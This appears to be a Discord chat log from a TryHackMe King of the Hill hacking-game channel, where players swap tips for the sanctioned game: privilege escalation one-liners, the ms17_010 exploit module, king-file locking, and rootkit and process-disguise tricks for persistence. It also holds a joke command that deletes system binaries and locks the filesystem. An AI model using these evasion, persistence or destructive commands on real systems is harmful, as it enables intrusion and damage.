I've sent you the links in DM (to avoid being muted for advertisements 🙂 )
Yes it is and thank F11snipe for creating it and making it available for community. I guess it needs to be updated tho because I didn't see any game with new released Fireworks koth machine... somehow those games are skipped
Gave +1 Rep to @charred hare (current: #14 - 559)
Ahhh good catch.. I can check into an update for that.
@young bramble Will let you know when it's finished... Also planning on putting together a player profile page with additional metrics like nemesis (who you lose to the most) and nemesis of and a few others
nice 🙂 thanks
Gave +1 Rep to @broken pilot (current: #73 - 88)
lets play a game https://tryhackme.com/games/koth/join/bafd2c6791134b12ce3a1a5c
Gg @light flame i dont wanna do the remount stuff the whole time, lemme learn a bit😂
gg
GG
yup im still here
mind if I dm?
yeah sure
i had the same issue on my mac mini which has no antivirus any new configuration of vpn dont work for me but i had an old backup of my files with an old vpn configuration im using its working on both my laptop and my mac mini 👍 idk why i cant use a new vpn configuration 🧐
anyone
ur boring @fallen palm have fun gg
King of the hill channel question
what question?
I am doing a king of the hill challenge now but my vbox seems to be running very slow, any suggestions on how to speed up my response?
virtual box or attackbox from thm?
nah virtual box is better, are u already connected with the target or is ur own shell working slow?
i had it sometimes that the target was pretty slow
I am connected , I am doing things like nmap, nikto just to get started, is there something I should do to start faster?
i mean rustscan is way faster than nmap but idk about the other stuff
Thank you that is a start, I will use rustscan in the next challenge.
are you using nmap -A cause that is really really slow
I use only min to get the open ports (-Pn -p- T4)
so on a linux machine i put myself as king in the king file but what about windows machines?
c:\king.txt
or c:\Administrator\king.txt
nah, they changed both windows machines' king location to c:\king.txt recently
oh fr? didn't notice
Anyone here found all 6 flags in fireworks koth.? I found 5 only.
I found 6. How do you know there are only 6 in total ?
Just a random guess as many machines have 6
food, shrek, fortune, panda, offline have 8, hackers have 9, carnage and hogwarts have 7...
on the right side of the flag submission button there is a flag and it tells you how many flags are on the machine btw
what is the first step in the king of the hill challenge?
Enumeration, portscan probably, looking for open ports and what services are running on them
I got that , then did nikto but still struggling to find flag
@light flame you skinny kidde
lol what happened now
I've no idea, he even sent a DM but I've heard nothing after that🤷♂️
he just sent me some bad words while we were playing koth
Lmfao I never noticed that..xD
New way to communicate with the LKM.
Using a trusted procfs entry as a front (like kallsyms), no syscall hooking is taking place and everything looks normal
I also went over the kernel to give arbitrary processes root credentials, while the kernel purposefully doesn't provide such an API
As you can see on the left side of the screen
I hope you guys like my new creation :) code will be open sourced after I clean it up and perhaps add some more features
interesting 👍
Does someone know why you can't set your ruid to 0 if your euid is 0 on carnage? If I run python3 -c 'import os;os.setuid(0);os.system("/bin/bash")', I get a PermissionError.
u probably need sudo perm with python to use these command i guess
No, on all other machines it works, and the idea of this command is to make your ruid 0 after you used an suid binary to get root. If you got root through sudo your ruid is already 0 so in that case this command isn't even needed.
@timber vale how are u in 3 games at once?
i play the first game get king go to the other ones 👍
i thought u only can be in 2 at once lol
So you can only host 2 games at a time but you can join in more than 2 if someone else is hosting the match
ohh okeyyy
how comes😂
U just cloned urself congrats😂
@south pulsar what is this this TestUser8422 wasnt here when the game started so he must have got a link and the only thing he did is just reset
he also never had activity until today 🧐
i dont know who the hell is he
he must have a link the reset needed two persons thats why
i'm not playing this koth match
maybe , i dont even see the game
i was playing htb now
he prolly added an alt account to reset intentionally 😂
bruhs i have a doubt in koth i can find all flags but i cant make the king time anybody say how can get into it? i need steps not solution
U have to put ur name in king.txt to get king points, in linux machines its in /root
@timber vale dont u get bored?
sure🤣
no, but I will be happy if the box isn't randomly reset
ok
@south pulsar congrats, you reset enough to make me lose😂
you play very well 🤣
😂 i dont just play koth all day i play chess sometimes watch some yt vids finish some thm rooms or do some programming ...
ohoh 👀
naah that's definitely sus
At least he's going soft core mode, not like his friend WildInsect
And he was polite to you
Why does koth always cause this behaviour 💀
Cause its a game, always people like this in games😅
Mhh
Brain dead dudes be like that
💀
man, THM should use koth.guru if he wants to get more proof about fake accounts on koth 🤣
btw, great job for creating koth.guru @fossil pecan 🙏
Agreed
bro attacking bravosec? damn
bravo is your father ?
relax bro
YUP
@south pulsar has been warned.
idk whats wrong with them
How bro felt after that
😂
Can I DM you?
yes
aliali..0541 why you play very dirty remove binaries and reboot machine ....
😂 you wont win removing mount will only backfire on you cuz mounting and umounting is possible in other ways ....
is having redirects from a koth website to it opening applications on your computer allowed. Im guessing people are not allowed to modify the web-page so this happens.
koth team should consider writing a LKM to hook all operations that can break the rules
This is a very interesting issue to discuss, because in fact an LKM is something very strong against players who do not have the slightest knowledge about a rootkit, and most of the time few, very few players even know how to play against it and there are few players that can count on a hand that uses the LKM to protect the king, in addition to the fact that an LKM connects syscalls, changing the default behavior
Yeah i already made one LKM that protects important system paths and processes, and koth services
LKM I say, created to protect the king, if it's something common like hiding processes or directories, I don't see why they should be banned, why a userland rootkit can also do the same, the difference is that userland is easier to be detected, and there is also a way to create a user rootkit to protect the king, however, something at the kernel level is always much stronger and difficult to remove
I guess its not hard for them to make one
There is also the issue of compatibility with the koth kernel, as it is older (so this could also be another of the difficulties of creating something like this for koth) , but when I played koth, I don't know how it is now, but there were few players who used LKM to hide processes/directories, and even fewer players who use it something at kernel level to protect king
however, the fact remains that most LKMs can still be bypassed...
They can be bypassed, but not all players can do this, the minority can
if you put a new koth player against something like that, he will hardly know what to do
yeah, but there are a lotta experienced players... all it takes is just a few games to analyze the behavior of the lkm, and put up a strategy to bypass it
Yeah
these hackers man... they are going out of control smh.
how hard are the koth?
Calling the dude a hacker is more out of control
Hey @timber vale, how did you lock the king file like that? 🙂
I know about chattr, but what you did was different, no?
yeah it was different but thats my trade secret 🙃
Damn... Alright, I'll figure it out sooner or later..
What about your infinitely looped hidden directories? I couldn't figure out what you were doing in there, so I just kept deleting them.. lol
i didnt have any hidden directories 🧐 and no infinite loop
I suggest watch old JH videos. You will find out lol
/var/spool/mail/.../root/root/root - what's that about? 🙂
Haha thanks, I will. I've watched a bunch but lots left to go through. Any particular recommendations?
yeah i had a pspy there but i didnt have any infinite loop
in /var/spool/mail/... but nothing in /root ...
Can't recall a title but he did something when he was not able to use chattr
Maybe it's auto created by pspy ? /var/spool/mail/.../l/l/l/l/l/l/l/l
Alright thanks, I'll look it up 🙂
no i downloaded it my self in there the pspy name was changed to l
Oh I see 🙂
you can download it from https://ch1.pro/files/binaries/chattr or you can get it online and compile it, there are a lot of different ways to protect king rather than chattr
yup
I was using pspy as well, that's how I saw some of what you were doing. and i moved in a static chattr binary, but it didn't do me a whole lot of good, lol. But it's a fun learning experience 🙂
The first thought that came to my mind was blockdev.
Any thoughts
My vpn is acting up and I'm too tired to fix it. Catch you next time @timber vale
ok
he keep shutting down the machine its annoying and against the rules:
patch the machine so he cant get root then?
How will he patch it if he keeps shutting it down ???
i mean he always gets in machines in 1 Minute, so basically he is in before everyone right? so he can just patch it? "he keeps shutting down" means it repeats so there is a time where he could patch it, but as far as i know Ch1 never patches machines he just plays king
I'd love to see you patch a machine within a 1 minute time span before shutting it down again
Well you got your answer then
we dont know how long aliali takes to get in so idk
rm $(whereis reboot) ; ln -s /dev/null /usr/sbin/reboot; rm $(whereis iptables) ln -s /usr/sbin/iptables; rm $(whereis shutdown) ln -s /dev/null /usr/sbin/shutdown; cd / ; chattr +iau *
i'm kidding 😄 🤣
remove the binaries that can shutdown/restart the machine, and remove iptables, and then send everything to /dev/null
but removing binaries is against the rules, you can only remove chattr xd
Mmm they should made an exception for reboot and shutdown
As rebooting / shutting down is against the rules too
using iptables too
iptables can block specific packets, specific IP, etc.
but in the rules it says you can only remove chattr
Idk, never played koth
And I think I dont want to
When reading this channel sometimes
Nah lmfao
Yeah it's sad
Shutdown and reboot are symlinks to systemctl so this doesn't remove the binaries😂
damn, true, I had forgotten 🤣
So this is the guy who turns off the machines? I have a slight impression that I played against him a long time ago
Or maybe it was him with another account, but from the same country
this is actually quite interesting, since shutdown and reboot themselves aren't binaries, it's technically not forbidden to mess with them.
🤣
Aah that aliali guy, that's why everyone had to reset the machine 4 times and still we couldn't connect to the machine cause he was shutting it down
there is an easier way of doing this without breaking the rules. We can create scripts with names like halt, poweroff, reboot, shutdown, etc. in a folder in $PATH that is checked before the folder where original binaries are located (/usr/local/bin for example) we can put there things like: "echo Shuting down; kill -9 $$ $PPID" 😆 or we can set aliases for them too
someone up for koth? https://tryhackme.com/games/koth/105612
I am playing now
I am in
nice
Let's use discord for voice chat
I see you on voice chat, how do I join?
Just click on #koth-voice-chat
no one was with me from the start and the game started anyway.
sometimes this could happen if someone quit just before the game start but in this case
no one even joined from the beginning 😂
Can I join?
ok let me send you link im very bad at windows anyway
Please do not choose windows machine
its offline machine
I have not been win priv esc yet
yeah im very bad at windows too but this machine is just vulnerable to ms17_010 you can use it from metasploit and get a shell and no need to privesc
exploit/windows/smb/ms17_010_psexec
Nice
I am in
Did you overwrite all flags? @timber vale
You have broken my shell now @timber vale
lol
no and no
i didnt do any of those things
im playing two other games
I am not able read any flags and size of all flags are same abruptly .
i didnt modify anything what cmd you used to read flags
dir flag.txt
Please extend timer for a bit
I want to try more
i cant extend the game its a public game
Oh
this is also a public game that will start after 3 min:
https://tryhackme.com/games/koth/join/14f73e5b7f4bf0707e2e69b1
and no one is there
Me too
i dont have premium rn so i cant make private rooms but i dont think you can even extend the time if you have premium the machine is just one hour but im not sure
Yeah it's true
I found gloria's key and password too
but I am not able to login through SSH
Any idea
Did you disable ssh? @timber vale
no i didnt i dont patch in most public games if you are not actively resetting or shutting down the machine
but i didnt disable anything thats against the rules
try using port 1337
i think ssh is on that port
by default
I did not see that port open wow.
I cracked password and it was dance but it is not accepting it. @timber vale
yeah idk why then i never used that way of getting in so i dont know but let me check if that key is there
Thanks
Do you mean LFI?
You can make a private game without premium, but the machine will still be random.
Nice
really..?? @mild forge
It's allowed to stop services if you can't patch them, or change SSH port (which requires a restart)
did anyone patch Tomcat/Coyote
I have a question guys. Is there anyway I can redirect my commands from my terminal to nc shell after getting connection from box. Like can I run a script stabilise shell.
I am not able to find king.txt file in offline machine
If u don't find it in C:/ then u have to create it
pwncat
Without any tool.
Then write the commands urself 
Do you know command
Please check your DM
i think its in C:\Users\Administrator\king-server
We have two pwncat tools. Which one are you referring to?
pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE) - cytopia/pwncat
This one, but sadly it's not maintained anymore 🥲
pwncat-cs is god tier.
I helped a little bit in this tool 
Yea this one
I had a chance to maintain this project, but I had my Uni then😭
Do you mean this one @near lily https://github.com/cytopia/pwncat?tab=readme-ov-file
@frail nymph pwncat-cs ^
I have downloaded Pwncat and pwncat-cs
Can you send me some reference how can I use it.
Literally read their github, it will show you faster than I can tell you.
I have noticed that I missed an error Error: uninstall-no-record-file
Any idea @near lily
new zine on phrack -> http://phrack.org/issues/71/12.html
Phrack staff website.
Finding hidden kernel modules (extrem way reborn): 20 years later
My rootkit is not detected by nitara2 (tested on ubuntu 22.04) but I can't understand why. It's not doing anything different than KoVid in terms of hiding itself. It might be those checks they do to figure if a module is sane enough to be a real module
This new zine that came out on phrack is really interesting, I'm thinking about implementing some things I saw in it, but unfortunately, it only detects it, but it's very good, I have ideas on how to make it visible again
KoviD is currently the best lkm rootkit
so it's legal to use it as forensics tests
who's h4des666?
he put down koth service on multiple games
and shutdown/reboots the box
Please don't cross post this.
@timber vale go easy lol
is KOTH down?
never mind, was getting 404 when attempting to join public game.
@timber vale you gotta show me some tricks!
lets go appreciate it!! just won my first match.
That's nice.
+rep @obsidian lark
I would create a static binary and give it a name similar to one of the processes running on the system like agetty, apache or apache2, fcron, httpd with minor changes (e.g. agentty) and pass fake arguments to write to king.txt and reverse shells :p
Gave +1 Rep to @obsidian lark (current: #447 - 11)
^
ayee thanks!
Gave +1 Rep to @placid fable (current: #35 - 220)
hes back lol
ur hades?
nah deadsecarmy
icic
is the ftp server broken?
nah someone reset
wait are you guys already off of hogwarts lol?
im still playing lol
yeah i cant even ping to the ip anymore
all my connections are timing out
to the machine
yeah its weird. I was previously logged into the ftp server too and got the secret file that's in there but when changing directories, it was not too fond of that command i guess.
there's no point playing now, he uses autopwn
bruh autopwn is so annoying but it lowkey gets you ready for whats really out there!!
is the rootkit being used by others when all my permissions are cut in my root shell?
im gonna practice writing to king.txt but some people are so quick to get there and make it a read only file and that leaves me stumped.
umount -l /root/king.txt - remove mount
yeah i tried that ass root and im hit with permission denied messages. i was also on your git page trying some magic on there but also denied with a couple of those cmds as well
as*
there's currently 4 different king.txt all different extensions
its prolly a loop, find pid -> kill it
... just gonna add that it is comparatively much easier to kill a ssh session than it is to kill a reverse shell. Just don't upgrade the shell and stay without tty.
oh buddy the nyan cat
just popped up
thats actually pretty funny
getting straight up nyaned
even without tty there is still how to spawn a nyancat in your shell hahaha
indeed, it just makes it a bit of an effort for the attacker. Otherwise you die with basic oneliners working off who or w
in fact even if you enter without tty your PID will still be visible in ps aufwx for example and then the other attacker can kill your PID this happens a lot in koth unless you use setsid to trick other opponents with names of processes similar to a normal process
btw or hide your process using rootkit userland/kernel land, or use a simple trick with mount, to mount your process in another directory, just to avoid them killing your shell, there are players who can only play like this 😄
anyone wanna play a private match?